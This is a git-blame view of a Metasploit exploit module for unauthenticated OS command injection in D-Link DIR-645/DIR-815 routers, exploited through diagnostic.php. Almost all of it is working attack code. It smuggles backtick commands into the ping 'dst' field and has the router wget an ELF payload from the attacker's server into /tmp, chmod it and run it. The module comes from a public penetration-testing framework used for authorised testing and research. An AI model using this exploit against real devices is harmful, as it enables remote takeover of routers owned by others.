Files
metasploit-gs/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

223 lines
7.1 KiB
Ruby
Raw Normal View History

2013-04-05 19:56:15 +02:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2013-04-05 19:56:15 +02:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-04-05 19:56:15 +02:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
def initialize(info = {})
super(update_info(info,
2013-07-23 14:11:16 -05:00
'Name' => 'D-Link DIR-645 / DIR-815 diagnostic.php Command Execution',
2013-04-05 19:56:15 +02:00
'Description' => %q{
2013-07-23 14:11:16 -05:00
Some D-Link Routers are vulnerable to OS Command injection in the web interface.
On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On
version 1.03 authentication is needed in order to trigger the vulnerability, which
2013-07-23 14:11:16 -05:00
has been fixed definitely on version 1.04. Other D-Link products, like DIR-300 rev B
and DIR-600, are also affected by this vulnerability. Not every device includes
wget which we need for deploying our payload. On such devices you could use the cmd
generic payload and try to start telnetd or execute other commands. Since it is a
2013-04-15 13:27:47 -05:00
blind OS command injection vulnerability, there is no output for the executed
command when using the cmd generic payload. A ping command against a controlled
system could be used for testing purposes. This module has been tested successfully
on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the
vulnerability.
2013-04-05 19:56:15 +02:00
},
'Author' =>
[
2014-07-11 12:45:23 -05:00
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
2013-04-05 19:56:15 +02:00
'juan vazquez' # minor help with msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-100005' ],
[ 'OSVDB', '92144' ],
2013-04-09 11:56:53 +02:00
[ 'BID', '58938' ],
[ 'EDB', '24926' ],
2013-04-05 19:56:15 +02:00
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-017' ]
],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2013-03-05',
2013-04-05 19:56:15 +02:00
'Privileged' => true,
'Platform' => %w{ linux unix },
2013-04-05 19:56:15 +02:00
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
2013-04-05 19:56:15 +02:00
))
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
register_options(
[
OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
])
2013-04-05 19:56:15 +02:00
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
def request(cmd,uri)
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'vars_post' => {
"act" => "ping",
2013-04-15 13:27:47 -05:00
"dst" => "` #{cmd}`"
}
2013-04-05 19:56:15 +02:00
})
2013-04-15 13:27:47 -05:00
return res
2013-04-05 19:56:15 +02:00
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return nil
end
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
def exploit
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
uri = '/diagnostic.php'
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
if target.name =~ /CMD/
if not (datastore['CMD'])
2013-08-15 14:14:46 -05:00
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
2013-04-05 19:56:15 +02:00
end
cmd = payload.encoded
res = request(cmd,uri)
if (!res)
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
2013-04-05 19:56:15 +02:00
end
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
2013-04-05 19:56:15 +02:00
return
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#thx to Juan for his awesome work on the mipsel elf support
@pl = generate_payload_exe
@elf_sent = false
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#
# start our server
#
resource_uri = '/' + downfile
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
if (datastore['DOWNHOST'])
service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
else
#do not use SSL
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#we use SRVHOST as download IP for the coming wget command.
#SRVHOST needs a real IP address of our download host
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
datastore['SSL'] = true if ssl_restore
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#
# download payload
#
2013-07-23 14:11:16 -05:00
print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
2013-04-05 19:56:15 +02:00
#this filename is used to store the payload on the device
filename = rand_text_alpha_lower(8)
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#not working if we send all command together -> lets take three requests
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
res = request(cmd,uri)
if (!res)
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
2013-04-05 19:56:15 +02:00
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
# wait for payload download
if (datastore['DOWNHOST'])
2013-07-23 14:11:16 -05:00
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
2013-04-05 19:56:15 +02:00
select(nil, nil, nil, datastore['HTTP_DELAY'])
else
wait_linux_payload
end
register_file_for_cleanup("/tmp/#{filename}")
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#
# chmod
#
cmd = "chmod 777 /tmp/#{filename}"
2013-07-23 14:11:16 -05:00
print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
2013-04-05 19:56:15 +02:00
res = request(cmd,uri)
if (!res)
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
2013-04-05 19:56:15 +02:00
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#
# execute
#
cmd = "/tmp/#{filename}"
2013-07-23 14:11:16 -05:00
print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
2013-04-05 19:56:15 +02:00
res = request(cmd,uri)
if (!res)
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
2013-04-05 19:56:15 +02:00
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
# Handle incoming requests from the server
def on_request_uri(cli, request)
#print_status("on_request_uri called: #{request.inspect}")
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
# wait for the data to be sent
def wait_linux_payload
2013-04-15 13:27:47 -05:00
print_status("#{rhost}:#{rport} - Waiting for the target to request the ELF payload...")
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
waited = 0
while (not @elf_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it can't connect back to us?")
2013-04-05 19:56:15 +02:00
end
end
end
end